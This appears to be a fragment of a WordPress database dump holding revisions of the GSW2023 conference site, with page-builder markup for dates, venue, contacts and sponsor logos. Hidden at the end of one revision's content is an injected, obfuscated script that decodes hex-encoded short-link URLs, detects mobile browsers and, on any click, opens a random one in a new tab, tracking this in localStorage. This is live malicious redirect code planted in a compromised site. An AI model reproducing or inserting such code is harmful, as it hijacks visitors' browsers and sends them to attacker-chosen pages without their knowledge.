el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-21 23:42:45','2023-06-21 23:42:45','',3066,'https://gsw2023.com/?p=4733',0,'revision','',0),
(4734,1,'2023-06-21 23:46:49','2023-06-21 23:46:49','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text 